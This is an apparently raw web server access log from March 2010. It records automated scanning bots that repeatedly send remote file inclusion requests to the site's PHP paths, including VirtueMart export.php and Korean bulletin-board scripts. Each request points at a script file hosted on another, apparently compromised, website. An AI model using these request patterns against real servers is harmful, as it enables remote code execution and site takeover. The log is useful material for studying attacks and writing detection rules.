115.68.52.19 - - [11/Mar/2010:09:37:39 -0800] "GET /logs/access_100121.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:37:39 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:39:12 -0800] "GET /bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:39:12 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:39:12 -0800] "GET /logs/access.log//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:39:26 -0800] "GET /bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:39:27 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:39:27 -0800] "GET /logs/access.log//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:40:48 -0800] "GET /logs/access_100121.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:40:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:40:48 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:41:57 -0800] "GET /bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:41:57 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:41:57 -0800] "GET /logs/access.log//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:42:35 -0800] "GET /bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:42:35 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:09:42:35 -0800] "GET /logs/access.log//bbs//download.php?board_skin_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:42:58 -0800] "GET /?sel=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:42:58 -0800] "GET /logs/?sel=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:42:58 -0800] "GET /logs/access_100121.log%20%20/?sel=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:43:12 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:43:12 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:43:15 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:43:54 -0800] "GET ///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:43:54 -0800] "GET /logs/access_091228.log%20%20////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:43:55 -0800] "GET /logs////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 1517 "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:44:54 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:44:54 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:44:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:45:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:45:30 -0800] "GET /logs/access_091228.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:45:31 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:45:36 -0800] "GET /logs/access_100121.log/?sel=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:09:46:29 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:09:46:29 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:09:46:29 -0800] "GET /logs/access_100225.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:47:00 -0800] "GET /logs//skin/ggambo6200_board/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:47:00 -0800] "GET /logs/access.log//skin/ggambo6200_board/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:47:00 -0800] "GET /skin/ggambo6200_board/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:48:29 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:48:29 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:48:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:49:30 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:50:57 -0800] "GET /logs/access.log//skin/ggambo4100_board/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:50:57 -0800] "GET /logs//skin/ggambo4100_board/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:50:57 -0800] "GET /skin/ggambo4100_board/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:52:43 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:52:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:52:46 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:54:00 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:54:56 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:54:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:54:56 -0800] "GET /logs/access_091228.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:56:35 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:56:35 -0800] "GET /logs/access_091228.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:56:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:56:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:56:37 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:09:56:37 -0800] "GET /logs/access_091228.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:00:13 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:00:13 -0800] "GET /bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:00:13 -0800] "GET /logs/access_100121.log//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:00:59 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:01:10 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:01:11 -0800] "GET /bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:01:11 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:10:01:36 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:10:01:37 -0800] "GET //bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:10:01:37 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:49 -0800] "GET //bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:51 -0800] "GET /logs///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:10:01:52 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:10:01:52 -0800] "GET //bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:10:01:52 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:55 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:55 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:55 -0800] "GET /logs///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:57 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:01:57 -0800] "GET //bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:01 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:01 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:01 -0800] "GET /logs///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:03 -0800] "GET //bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:08 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:12 -0800] "GET //bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:16 -0800] "GET //bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:16 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:17 -0800] "GET //bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:20 -0800] "GET /logs///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:21 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:21 -0800] "GET /logs///bbs//download.php?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:30 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:30 -0800] "GET //bbs//download.php?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:02:30 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
66.102.237.18 - - [11/Mar/2010:10:04:12 -0800] "GET /logs///bbs//download.php?board_skin_path=http://kopriusa.org/bbs/gn4/skin/popular/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
66.102.237.18 - - [11/Mar/2010:10:04:12 -0800] "GET //bbs//download.php?board_skin_path=http://kopriusa.org/bbs/gn4/skin/popular/id.txt??%0D?? HTTP/1.0" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
213.251.189.201 - - [11/Mar/2010:10:07:22 -0800] "GET /logs/access_100224.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.251.189.201 - - [11/Mar/2010:10:07:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.251.189.201 - - [11/Mar/2010:10:07:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
66.102.237.18 - - [11/Mar/2010:10:07:34 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://kopriusa.org/bbs/gn4/skin/popular/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
213.251.189.201 - - [11/Mar/2010:10:07:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.251.189.201 - - [11/Mar/2010:10:07:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.251.189.201 - - [11/Mar/2010:10:07:40 -0800] "GET /logs/access_100224.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:08:01 -0800] "GET /logs/access_100121.log//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:08:01 -0800] "GET /bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:08:01 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:10:08:13 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:10:08:13 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:10:08:13 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:10:08:23 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:10:08:23 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:10:08:24 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:08:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:08:41 -0800] "GET /logs/access_100224.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:08:41 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:08:51 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:08:51 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:08:51 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
